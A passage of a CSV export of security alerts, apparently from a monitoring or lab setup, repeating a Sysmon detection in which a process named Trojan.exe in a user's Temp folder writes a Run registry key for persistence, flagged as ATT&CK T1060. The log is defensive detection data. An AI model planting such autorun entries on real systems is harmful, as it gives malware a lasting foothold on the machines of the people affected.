..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:08.216579000Z"",""eventRecordID"":""2046"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:08.199\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:08.199"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:10.583",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:07.152 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:07.154338700Z"",""eventRecordID"":""2045"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:07.152\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:07.152"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:09.505",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:06.136 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:06.139605900Z"",""eventRecordID"":""2044"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:06.136\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:06.136"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:07.536",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:05.121 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:05.137181800Z"",""eventRecordID"":""2043"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:05.121\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:05.121"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:07.521",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:04.106 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:04.139076900Z"",""eventRecordID"":""2042"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:04.106\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:04.106"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:07.225",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:03.043 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:03.059615500Z"",""eventRecordID"":""2041"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:03.043\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:03.043"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:05.447",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:02.027 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:02.029229000Z"",""eventRecordID"":""2040"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:02.027\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:02.027"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:04.397",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:28:01.012 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:28:01.013343300Z"",""eventRecordID"":""2039"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:28:01.012\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:28:01.012"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:04.041",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:59.980 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:59.986553400Z"",""eventRecordID"":""2038"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:59.980\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:59.980"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:03.921",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:58.965 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:58.968913100Z"",""eventRecordID"":""2037"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:58.965\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:58.965"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:01.342",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:57.918 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:27:57.933372800Z"",""eventRecordID"":""2036"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:27:57.918\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:27:57.918"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:28:00.305",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:27:56.902 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 